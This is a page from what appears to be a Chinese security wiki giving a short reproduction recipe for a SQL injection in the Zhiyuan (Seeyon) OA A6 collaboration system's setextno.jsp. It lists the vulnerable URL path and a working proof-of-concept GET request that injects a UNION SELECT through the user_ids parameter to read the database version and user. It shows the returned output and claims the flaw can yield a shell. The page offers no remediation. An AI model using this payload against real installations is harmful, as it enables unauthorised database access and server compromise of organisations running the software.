menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 155-致远OA chevron_right 004-致远OA A6 setextno.jsp sql注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    004-致远OA A6 setextno.jsp sql注入漏洞.md
    578 B / 2021-07-17 00:01:26
        # 致远OA A6 setextno.jsp sql注入漏洞
    
    ### 一、漏洞简介
    
    用友致远A6协同系统SQL注入,union可shell
    
    ### 二、漏洞影响
    
    致远OA A6
    
    ### 三、复现过程
    
    漏洞位置:
    
    
    ```bash
    http://www.baidu.com/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp
    ```
    
    漏洞详情:
    
    版本:A6用友致远A6协同系统SQL注入,union可shell
    
    请求方式:
    
    Get
    
    Poc:
    
    
    ```bash
    http://url/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,@@version,user()%23
    ```
    
    回显内容
    
    
    ```
    5.0.41-community-nt 
    分机号root@localhost
    ```
    
    links
    file_download